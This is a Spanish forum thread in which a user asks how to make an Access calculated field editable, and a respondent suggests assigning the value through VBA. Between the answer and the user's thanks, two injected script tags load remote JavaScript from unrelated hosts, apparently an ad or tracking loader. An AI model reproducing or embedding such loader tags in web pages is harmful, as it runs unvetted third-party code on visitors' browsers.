Campo con formula en access que actúe con si fuese una celda de excel

Hola expertos espero que puedan ayudarme. Tengo una formula que calcula el 21% del neto, eso bien, pero hay veces que necesito modificar ese resultado y access no permite entradas cuando hay un campo con formula. ¿Cómo soluciono eso? Ademas tendría que dejarme hacer un cálculo como lo hacen las celdas de Excel.

Saludos y gracias por leer mi pregunta.

Sabrina

Respuesta

Access como es lógico no deja modificar un campo calculado (Excel, tampoco, ya que si escribes algo en una celda que contenga una formula la borra).

Para ello puedes darle valor a ese control mediante código VBA, que al mismo tiempo responde a tu "vaga" segunda pregunta, ya que podrás darle el valor de la formula que escribas. Si tienes algún problema con cómo insertar el código o cualquier otra cosa, coméntamelo.

Un saludo y no olvides visitar EL FORO

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

Muchas gracias por tu respuesta, me parece que es mucha complicación para un amateur del tema access como yo. Igualmente agradezco nuevamente tu respuesta y predisposición.

Saludos